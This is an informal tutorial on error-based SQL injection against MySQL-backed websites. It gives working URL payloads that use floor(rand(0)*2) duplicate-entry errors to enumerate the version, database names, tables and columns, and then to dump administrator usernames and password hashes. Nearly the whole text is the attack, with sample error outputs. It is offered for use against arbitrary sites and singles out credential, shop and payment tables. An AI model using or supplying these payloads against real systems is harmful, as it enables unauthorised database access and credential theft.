Error Based
By injecting a specific query, i will show you this later in the tutorial. We
get an error message returning in the page.
This msg actually gives us sensitive database information. That's why we call
this error based SQL injection.
Determine
when we should use error or double query Injection.
you switch over to union select statements the page then returns an error
saying something like:
Case 1:
The
Used Select Statements Have Different Number Of Columns.
Case
2:
Unknown
column 1;
Case
3:
Nothing
returns at all. And you can't find the columns on the web content.
Then you can also use error based Injection.
These
are the most common cases when we can use error based and double Query
Injection.
Now that we know when to use this and you have a page whit a case like that
let's move on!
Get the MySQL Version.
The query to get the MySQL version for error based injection is:
+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--
In
URL:
http://www.[site].com/page.php?id=1+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--
What does this line of code actually say?
We need to group by concat_ws because this concat allows us to inject more then
one statement at a time.
In this case injecting a colon(ox3a) and the version. All the other stuff is to
actually retrieve info in our error msg.
Returned error message:
Duplicate
entry '~'5.1.41'~1' for key 1
This means this Web Page has MySQL version 5.1.41.
Get the Database Name
To get the database name it's already a little more complicated.
First of all there can be more then one database on a server. Ill explain how
to find those as well!
The Query to get database names:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x+a)
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x+a)
Look closely at this query! Look for limit 0,1 This is how we find more
databases inside a server.
If we edit 0,1 to 1,1 and keep increasing 2,1 and further until you don't see
any changes any more.
That way you know you got all databases. Put those in a notepad you will need
the first later on in this tutorial.
What does this query tell us?
In concat we can select more then on statement as i said before whit the
version. This way we now select the database name using a method called cast.
You will be seeing more about cast as you advance in SQL Injection. We say we
want to get the database (as char) in characters from information_schema which
is the database.
Duplicate
entry '~'Ignotus_1' for key 1
That means our database name is Ignotus_1.
When i increased the limit nothing changed meaning we have only one database.
Write down that database name you will be needing that name.
Get the Table Names
Now we are getting somewhere we need the more difficult stuff. Getting the
table names.
Be sure to use the hackbar because it really eases you're stuff.
The Query to get the Table names:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit
0,1),floor(rand(0)*2))x from+information_schema.tables+group+by+x)a)
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Yet again i use the limit function here. Only that way you can get all tables
using error based injection.
By increasing that limit as previously explained you will find them all.
As i said in my first tutorial always look for useful tables. Admin tables,
members tables, user anything to do whit user credentials is interesting.
For black hats probs shop tables or payments sections are interesting as well
but i don't want to support black hatting!
What does this extremely large Query tell us?
Using the select in the concat method again and whit casting table_name as
characters we ask the table name from the information_schema (database).
Thats the easyest explenation i can possebly give.
For limit 0,1:
Duplicate
entry '~'tbl_news' for key 1For limit 1,1:
Duplicate
entry '~'tbl_gallery' for key 1For limit 2,1:
Duplicate
entry '~'tbl_userAdmins' for key 1
Finally something usefull: tbl_userAdmins.
Now that we have ourselves an interesting table we want to extract information
out of it.
Get the Column Names
Yet another step further this won't get more easy. And this is still regular
error based people.
SQL Injection is hard you need your brains!
The Query to extract the column names from tables:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLENAMEHERE+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
It is important to look at this code
where it said TABLENAMEHERE we need to put our table in hex.Be sure that 0x is
in front so the MySQL server knows what it is.
In the hackbar go over to encoding there choose encode in hex first format. Or
go to the next site and put the table name on where is sais "Say hello to
my little friend" http://www.swingnote.com/tools/texttohex.php.
There is also a limit behind our hex.
We are going to need this limit to successfully extract all columns.
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLENAMEHERE+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Now what does our Query tell us?
We select the column_name using cast and want it to return in characters using
as char, from the database but this time also from the table.
The one we put there in hex. And whit a limit to get all the different columns
in there.
Now my first error is:
Duplicate
entry 'admin_NAME' for key 1
That will get us the admin name we need. If you haven’t got that just increase
the limit.
Now i need my next column i need the passwords of course. For sake of
simplicity that’s my next one.
Error code:
Duplicate
entry 'admin_PWD' for key 1
Now we finally get on to the fun part where we get
our admin / PWD!!
Extracting Information from the Columns
Every one likes this part! The part where we finally get to something!
Any ways i have to tell you this is only half of the tutorial. We only covered
error based. Double Query is beyond this part.
(Beware where it said admin_Name and admin_PWD you have to
replace whit the username and password column you extracted before!
Also where it says tbl_userAdmins put your table name where you
extracted the columns from.
Almost forgotten the database name did ya?? Well this is where you need it.
Where it said Ignotus_1 there is where you put the database
name.)[/size]
Our Query to extract information:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(admin_NAME,0x7e,admin_PWD)+as+char),0x7e))+from+Ignotus_1.tbl_userADMINS+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(admin_NAME,0x7e,admin_PWD)+as+char),0x7e))+from+Ignotus_1.tbl_userADMINS+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
What does this Query tell us?
We select using the concat and cast (selecting admin_NAME 0x7e (colon) to put
admin name and admin_PWD together in our error message.
As char (in characters) from the database (Ignotus_1) of the table:
tbl_userADMINS.
Our error MSG:
Duplicate
entry 'uSploit~4c0e8eb3ed67f58dc56e724e5297a598~1' for key 1
Congratulations you successfully injected a vulnerable to error based SQL
Injection website. (mouth full)
